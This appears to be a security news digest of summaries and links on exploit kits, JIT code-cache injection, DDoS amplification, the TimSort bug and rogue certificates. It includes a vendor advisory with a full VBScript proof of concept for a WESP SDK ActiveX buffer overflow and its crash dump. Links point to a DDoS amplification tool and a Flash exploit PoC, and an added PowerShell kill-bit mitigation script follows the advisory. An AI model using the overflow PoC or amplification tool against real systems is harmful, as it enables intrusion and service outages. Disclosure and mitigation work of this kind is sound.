Channel: BOT24

RIG Exploit Kit – Diving Deeper into the Infrastructure

Following our previous blog post about the leaking of the RIG exploit kit's source code, we dug deeper into the architecture that facilitates the massive infections using RIG. The screenshot below diagrams RIG's infrastructure.
[Figure 1: RIG Exploit Kit Infrastructure]
Most commonly we see only one end of this rabbit hole: the compromised site and the proxy server. Below we will detail what happens behind the scenes during the infection and explain how RIG customers use it to deploy their infection campaigns.

more here...........https://www.trustwave.com/Resources/SpiderLabs-Blog/RIG-Exploit-Kit-%E2%80%93-Diving-Deeper-into-the-Infrastructure/

Paper: Exploiting and Protecting Dynamic Code Generation

Abstract—Many mechanisms have been proposed and deployed to prevent exploits against software vulnerabilities. Among them, W⊕X is one of the most effective and efficient. W⊕X prevents memory pages from being simultaneously writable and executable, rendering the decades-old shellcode injection technique infeasible.

In this paper, we demonstrate that the traditional shellcode injection attack can be revived through a code cache injection technique. Specifically, dynamic code generation, a technique widely used in just-in-time (JIT) compilation and dynamic binary translation (DBT), generates and modifies code on the fly in order to promote performance or security. The dynamically generated code fragments are stored in a code cache, which is writable and executable either at the same time or alternately, resulting in an opportunity for exploitation. This threat is especially realistic when the generated code is multi-threaded, because switching between writable and executable leaves a time window for exploitation. To illustrate this threat, we have crafted a proof-of-concept exploit against modern browsers that support Web Workers.

To mitigate this code cache injection threat, we propose a new dynamic code generation architecture. This new architecture relocates the dynamic code generator to a separate process, in which the code cache is writable. In the original process where the generated code executes, the code cache remains read-only. The code cache is synchronized across the writing process and the execution process through shared memory. Interaction between the code generator and the generated code is handled transparently through remote procedure calls (RPC). We have ported the Google V8 JavaScript engine and the Strata DBT to this new architecture. Our implementation experience showed that the engineering effort for porting to this new architecture is minimal. Evaluation of our prototype implementation showed that this new architecture can defeat the code cache injection attack with small performance overhead.

more here.........http://wenke.gtisc.gatech.edu/papers/sdcg.pdf

Hacking Oklahoma State University’s Student ID

In 2013 I took an Information Security class at Oklahoma State University. As a final project, we were broken into teams to find a security hole, and have a plan to theoretically exploit it.

I led this project, and in early 2014, gave a presentation to key faculty and IT security on campus. As I understand it, the final solution was to take down the website (https://app.it.okstate.edu/idcard/), and not worry about the rest. Fair enough.

Here http://snelling.io/hacking-oklahoma-state-university-student-id are the contents of my final report.

DDOS AMPLIFICATION ATTACKS & LINK TO DDOS AMPLIFICATION TOOL

During the last two years, we've seen DDoS attacks taking down high-authority websites and networks. Contrary to what we used to think, that such attacks need large-scale resources (a botnet or many compromised servers), these attacks are carried out by individuals or a small number of people (often teenagers) with limited resources.

more here.........http://www.pythonforpentesting.com/2015/02/ddos-amplification-attacks.html


DDOS AMP TOOL here...............https://github.com/OffensivePython/Saddam

WESP SDK multiple Remote Code Execution Vulnerabilities

Webgate technology is focused on digital image processing, embedded system
design and networking to produce embedded O/S and web server cameras
providing real time images. We are also making superior network stand-alone
DVRs by applying our accumulated network and video solution knowledge.

WEBGATE Embedded Standard Protocol (WESP) SDK supports same tools in both
network DVR and network camera.

Webgate Inc. Business Partners: Honeywell, Samsung Techwin, Bosch, Pentax
Technology, Fujitsu AOS Technology, inc

http://www.webgateinc.com/wgi/eng/#2
http://www.webgateinc.com/wgi_htdocs/eng/sdk_info.html

Vulnerability 1: WESP SDK WESPMONITORLib.WESPMonitorCtrl ActiveX LoadImage Buffer Overflow
Vulnerability 2: WESP SDK WESPCONFIGLib.UserItem ActiveX ChangePassword Buffer Overflow
Vulnerability 3: WESP SDK WESPMONITORLib.WESPMonitorCtrl ActiveX LoadImageEx Buffer Overflow
Vulnerability 4: WESP SDK WESPSERIALPORTLib.WESPSerialPortCtrl ActiveX Connect Buffer Overflow
Vulnerability 5: WESP SDK WESPCONFIGLib.IDList ActiveX AddID Buffer Overflow
Vulnerability 6: WESP SDK WESPPLAYBACKLib.WESPPlaybackCtrl ActiveX Connect Buffer Overflow
Vulnerability 7: WESP SDK WESPPLAYBACKLib.WESPPlaybackCtrl ActiveX ConnectEx3 Buffer Overflow


CompanyName WebgateInc
FileDescription WESPConfig Module
FileVersion 1, 6, 42, 0
InternalName WESPConfig
LegalCopyright Copyright (C) 2004-2010
OriginalFileName WESPConfig.DLL
ProductName WESPConfig Module
ProductVersion 1, 6, 42, 0

******************PoC for one of the above Vulnerabilities***********
<html>
<object classid='clsid:4E14C449-A61A-4BF7-8082-65A91298A6D8' id='target'>
</object>
<!--
targetFile = "C:\Windows\System32\WESPSDK\WESPPlayback.dll"
prototype  = "Sub ConnectEx3 ( ByVal bDvrs As Integer ,  ByVal Address As
String ,  ByVal Port As Integer ,  ByVal UserID As String ,  ByVal Password
As String ,  ByVal extcompany As Long ,  ByVal authType As Long ,  ByVal
AdditionalCode As String )"
memberName = "ConnectEx3"
progid     = "WESPPLAYBACKLib.WESPPlaybackCtrl"
argCount   = 8
-->
<script language='vbscript'>

arg1=1
arg2=String(1044, "A")
arg3=1
arg4="defaultV"
arg5="defaultV"
arg6=1
arg7=1
arg8="defaultV"

target.ConnectEx3 arg1 ,arg2 ,arg3 ,arg4 ,arg5 ,arg6 ,arg7 ,arg8

</script>
</html>
******************************
Stack trace for above PoC
Exception Code: ACCESS_VIOLATION
Disasm: 76ACD33D MOV CX,[EAX]

Seh Chain:
--------------------------------------------------
1 41414141


Called From                   Returns To
--------------------------------------------------
msvcrt.76ACD33D               WESPPlayback.999539
WESPPlayback.999539           41414141
41414141                      22E5E0
22E5E0                        2F712C
2F712C                        41414141
41414141                      41414141
41414141                      41414141
41414141                      41414141


Registers:
--------------------------------------------------
EIP 76ACD33D
EAX 41414141
EBX 039E0040 -> 009DF298
ECX E0551782
EDX 41414141
EDI 76AD4137 -> 8B55FF8B
ESI 76ACD335 -> 8B55FF8B
EBP 0022E56C -> 039E0020
ESP 0022E56C -> 039E0020


Block Disassembly:
--------------------------------------------------
76ACD333 NOP
76ACD334 NOP
76ACD335 MOV EDI,EDI
76ACD337 PUSH EBP
76ACD338 MOV EBP,ESP
76ACD33A MOV EAX,[EBP+8]
76ACD33D MOV CX,[EAX]  <--- CRASH
76ACD340 INC EAX
76ACD341 INC EAX
76ACD342 TEST CX,CX
76ACD345 JNZ SHORT 76ACD33D
76ACD347 SUB EAX,[EBP+8]
76ACD34A SAR EAX,1
76ACD34C DEC EAX
76ACD34D POP EBP


ArgDump:
--------------------------------------------------
EBP+8 41414141
EBP+12 0022E5E0 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EBP+16 002F712C -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
EBP+20 00000829
EBP+24 002F712C -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
EBP+28 0022E6D4 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA


Stack Dump:
--------------------------------------------------
22E56C 20 00 9E 03 39 95 99 00 41 41 41 41 E0 E5 22 00  [................]
22E57C 2C 71 2F 00 29 08 00 00 2C 71 2F 00 D4 E6 22 00  [.q.......q......]
22E58C B4 6F 2F 00 A0 E6 22 00 98 F2 9D 00 00 00 00 00  [.o..............]
22E59C B0 BA 2E 00 00 00 00 00 00 00 00 00 00 00 00 00  [................]
22E5AC 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  [................]

P.S. CERT tried to coordinate with the vendor for fixing the issues, but there wasn't any response from the vendor.

Best Regards,
Praveen Darshanam
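
A defensive follow-up added here, not part of the advisory: with no vendor response, the practical mitigation for an ActiveX overflow like this is the Internet Explorer kill bit, which stops the control from being instantiated from a web page while the DLL stays installed. The script uses the WESPPlaybackCtrl CLSID from the PoC above; the CLSIDs of the other affected controls are not given in the advisory, so they are not listed.

```powershell
# Added example, not from the advisory: set the IE ActiveX kill bit for the
# WESPPlaybackCtrl CLSID shown in the PoC. Run from an elevated prompt.
# Only that CLSID is on the page; CLSIDs of the other affected controls
# are not given in the advisory, so add them here if you obtain them.

$KillBitFlag = 0x400   # COMPAT_DISABLE_ACTIVEXCTRL, the documented kill-bit value

$Clsids = @(
    '{4E14C449-A61A-4BF7-8082-65A91298A6D8}'   # WESPPLAYBACKLib.WESPPlaybackCtrl (from the PoC)
)

# On 64-bit Windows both the native and the WOW64 compatibility keys are consulted
$CompatPaths = @('HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility')
if (Test-Path 'HKLM:\SOFTWARE\Wow6432Node') {
    $CompatPaths += 'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility'
}

function Set-ActiveXKillBit {
    param([string]$Clsid, [string]$BasePath)
    $key = Join-Path $BasePath $Clsid
    if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
    $current = (Get-ItemProperty -Path $key -Name 'Compatibility Flags' `
                -ErrorAction SilentlyContinue).'Compatibility Flags'
    # Preserve flags already present and OR in the kill bit
    $new = [int]$current -bor $KillBitFlag
    Set-ItemProperty -Path $key -Name 'Compatibility Flags' -Value $new -Type DWord
}

function Test-ActiveXKillBit {
    param([string]$Clsid, [string]$BasePath)
    $key = Join-Path $BasePath $Clsid
    $flags = (Get-ItemProperty -Path $key -Name 'Compatibility Flags' `
              -ErrorAction SilentlyContinue).'Compatibility Flags'
    return (([int]$flags -band $KillBitFlag) -eq $KillBitFlag)
}

foreach ($path in $CompatPaths) {
    foreach ($c in $Clsids) {
        Set-ActiveXKillBit -Clsid $c -BasePath $path
        '{0}\{1}: kill bit set = {2}' -f $path, $c, (Test-ActiveXKillBit -Clsid $c -BasePath $path)
    }
}
```

Reverse the change by clearing the 0x400 bit (or deleting the key) once a fixed DLL is installed.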

Paper: Surreptitiously Weakening Cryptographic Systems (Bruce Schneier; Matthew Fredrikson; Tadayoshi Kohno; Thomas Ristenpart)

Revelations over the past couple of years highlight the importance of understanding malicious and surreptitious weakening of cryptographic systems. We provide an overview of this domain, using a number of historical examples to drive development of a weaknesses taxonomy. This allows comparing different approaches to sabotage. We categorize a broader set of potential avenues for weakening systems using this taxonomy, and discuss what future research is needed to provide sabotage-resilient cryptography.

more here.............http://eprint.iacr.org/2015/097.pdf

The Malicious Loader from the Cloud

Recently, we found a simple malicious downloader that downloads a fake PDF file.  Unlike a normal malicious loader that integrates the PE Loader code into its binary, this loader has stripped this part and has turned to fetching it online.

more here.........http://blog.fortinet.com/post/the-malicious-loader-from-the-cloud

Targeted Attacks Against Code Underlying Financial Companies’ Trading Algorithms Are On the Rise

Security experts have observed an increasing number of targeted attacks against the code underlying financial companies’ in-house trading algorithms.

more here.......http://www.tripwire.com/state-of-security/latest-security-news/targeted-attacks-against-code-underlying-financial-companies-trading-algorithms-are-on-the-rise/

Simple Code Coverage Analyzer

coco.cpp is a simple pintool for code coverage analysis. It comes with the Pin Framework.

more here........http://reversingonwindows.blogspot.com/2015/02/simple-code-coverage-analyzer.html?spref=tw

Proving that Android’s, Java’s and Python’s sorting algorithm is broken (and showing how to fix it)

Tim Peters developed the Timsort hybrid sorting algorithm in 2002. It is a clever combination of ideas from merge sort and insertion sort, and designed to perform well on real world data. TimSort was first developed for Python, but later ported to Java (where it appears as java.util.Collections.sort and java.util.Arrays.sort) by Joshua Bloch (the designer of Java Collections who also pointed out that most binary search algorithms were broken). TimSort  is today used as the default sorting algorithm for Android SDK, Sun’s JDK and OpenJDK. Given the popularity of these platforms this means that the number of computers, cloud services and mobile phones that use TimSort for sorting is well into the billions.

Fast forward to 2015. After we had successfully verified Counting and Radix sort implementations in Java (J. Autom. Reasoning 53(2), 129-139) with a formal verification tool called KeY, we were looking for a new challenge.  TimSort seemed to fit the bill, as it is rather complex and widely used. Unfortunately, we weren’t able to prove its correctness. A closer analysis showed that this was, quite simply, because TimSort was broken and our theoretical considerations finally led us to a path towards finding the bug (interestingly, that bug appears already in the Python implementation). This blog post shows how we did it.


more here...........http://envisage-project.eu/proving-android-java-and-python-sorting-algorithm-is-broken-and-how-to-fix-it/

PwC Doc: A deeper look into ScanBox cybercrime tool

Security researchers have often made the mistake of assuming that when a specific tool was observed being used in espionage attacks, it was representative of activity of a single actor. More frequently, however, many are now identifying that distinct groups of attackers are sharing their toolsets, just as in the cybercrime world.

One such toolset, the ScanBox framework, is now shared between a number of groups who conduct espionage attacks. Evidence suggests that these groups include those behind the recent Forbes and Anthem attacks. This short paper outlines our current perspectives on the previously discussed espionage groups currently using the framework and a hint that a 5th player is getting in on the game.

more here..........http://pwc.blogs.com/files/cto-tib-20150223-01a.pdf

The Mac Facilitates Spying Too

I’ve been sitting on this information for some time, waiting to get more research done before I publish a post. But since word has come out about how Lenovo preloads what amounts to very bad spyware on their PCs, I thought I should also just go right ahead to spill the beans on the Mac.

Yes, that’s right. Superfish is bad. The problem with the Mac is only slightly related in that it also involves SSL certificates. It’s also bad, in a different way. I haven’t found out how the situation got to be like this, but I’ll just tell you what is happening.

more here........http://zitseng.com/archives/7489

Delete Known Government-Linked Certificate Authorities in OSX

Delete Known Government-Linked Certificate Authorities in OS X. This is in relation to the article titled "The Mac Facilitates Spying Too"

more here...........https://github.com/sammcj/delete-unknown-root-ca

NATIONAL INDUSTRIAL SECURITY PROGRAM OPERATING MANUAL

Leaked document describes security measures used by NSA.
More here.........http://www.dss.mil/documents/odaa/nispom2006-5220.pdf

SSL Blacklist

SSL Blacklist (SSLBL) is a project maintained by abuse.ch. The goal is to provide a list of "bad" SSL certificates identified by abuse.ch to be associated with malware or botnet activities. SSLBL relies on SHA1 fingerprints of malicious SSL certificates and offers various blacklists that can be found in the SSL Blacklist section.

more here...........https://sslbl.abuse.ch/

Malware Tracker: PDF Analysis

If you're an intrusion analyst on a small team (or maybe you ARE the team), you may be the only resource that has to look at a myriad of possibly malicious files that trigger your IDS or SIEM. You may not have either the time or the forensics skills to properly inspect each PDF or Flash file or Office doc that sets off an alert.
Fortunately, there are a lot of good resources available that can do at least a cursory examination of different types of files and indicate that you might need to flag that alert for investigation. That's not as good as having a forensics analyst to hand the file off to, but it's a whole lot better than ignoring the alert because you don't have the time or training to deal with it.

more here..........http://jeffsoh.blogspot.com/2015/02/malware-tracker-pdf-analysis.html

Cloudflare: TLS Session Resumption: Full-speed and Secure

In this article, I'll explain how we added speed to Universal SSL with session resumption across multiple hosts, and explain the design decisions we made in this process. Currently, we use two standardized session resumption mechanisms that require two different data sharing designs: Session IDs (RFC 5246) and Session Tickets (RFC 5077).

more here.........https://blog.cloudflare.com/tls-session-resumption-full-speed-and-secure/

Tearing Down Cryptowall (Cryptolocker and ransomware)

In today's blog we show a new approach to stopping ransomware such as Cryptowall, and how it is possible to use analytics to detect the shift in user behavior caused by malware such as Cryptowall and even destructive variants. After recognizing the attack, we stop infected data from replicating to the cloud.

more here..........http://www.405labs.com/blog/2015/2/17/putting-an-end-to-cryptowall-cryptolocker-and-the-like

FLASH, CVE-2015-0311 Exploit PoC

A critical vulnerability (CVE-2015-0311) exists in Adobe Flash Player 16.0.0.287 and earlier versions for Windows and Macintosh.  Successful exploitation could cause a crash and potentially allow an attacker to take control of the affected system.  We are aware of reports that this vulnerability is being actively exploited in the wild via drive-by-download attacks against systems running Internet Explorer and Firefox on Windows 8.1 and below.

PoC here...........http://blog.hacklab.kr/flash-cve-2015-0311-%EB%B6%84%EC%84%9D/

Windows Exploit Mitigation Technology – Part 2

In Part 1, we explained GS cookies and Safe SEH. If you haven’t read that part, it is highly recommended to read it first.

The Enhanced Mitigation Experience Toolkit, or EMET, is essentially a shield or a shell that runs over Windows applications and protects them, regardless of how those applications were originally coded by their developers, by taking advantage of the security safeguards built into the Windows operating system. EMET is a wrapper that enables and enforces a set of protections that, when used together, genuinely enhance the security posture of a machine and greatly reduce the chance that exploits can run against your machine and cause any harm; most will simply fail to execute completely.

more here.........http://resources.infosecinstitute.com/windows-exploit-mitigation-technology-part-2/